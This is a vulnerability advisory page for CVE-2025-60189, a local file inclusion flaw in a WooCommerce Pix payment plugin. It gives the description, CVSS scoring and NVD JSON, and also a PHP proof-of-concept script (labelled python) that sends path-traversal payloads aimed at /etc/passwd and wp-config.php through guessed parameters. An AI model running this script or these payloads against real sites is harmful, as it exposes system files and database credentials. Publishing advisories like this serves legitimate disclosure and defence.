Security Vulnerability Report
中文
CVE-2025-60189 CVSS 7.5 HIGH

CVE-2025-60189

Published: 2025-11-06 16:16:04
Last Modified: 2026-04-28 19:34:41

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in PoloPag PoloPag – Pix Automático para Woocommerce wc-polo-payments allows PHP Local File Inclusion.This issue affects PoloPag – Pix Automático para Woocommerce: from n/a through <= 2.0.9.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

PoloPag – Pix Automático para Woocommerce <= 2.0.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php // CVE-2025-60189 PoC - PoloPag Local File Inclusion // Target: WordPress site with PoloPag plugin <= 2.0.9 $target = "http://target-site.com"; // Replace with target URL $plugin_path = "/wp-content/plugins/wc-polo-payments/"; // LFI via vulnerable parameter (example endpoint) $vulnerable_params = [ // Common parameter names that might be vulnerable "file", "page", "template", "view", "controller" ]; foreach ($vulnerable_params as $param) { // Read system files $payloads = [ "/etc/passwd", "../../../../../../etc/passwd", "/etc/hosts", "../../wp-config.php" ]; foreach ($payloads as $payload) { $url = $target . $plugin_path . "?" . $param . "=" . urlencode($payload); echo "[*] Testing: " . $url . "\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($http_code == 200 && strpos($response, "root:") !== false) { echo "[!] VULNERABLE! File content leaked:\n"; echo $response . "\n"; } } } ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60189", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:03.717", "lastModified": "2026-04-28T19:34:41.367", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in PoloPag PoloPag – Pix Automático para Woocommerce wc-polo-payments allows PHP Local File Inclusion.This issue affects PoloPag – Pix Automático para Woocommerce: from n/a through <= 2.0.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wc-polo-payments/vulnerability/wordpress-polopag-pix-automatico-para-woocommerce-plugin-2-0-9-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}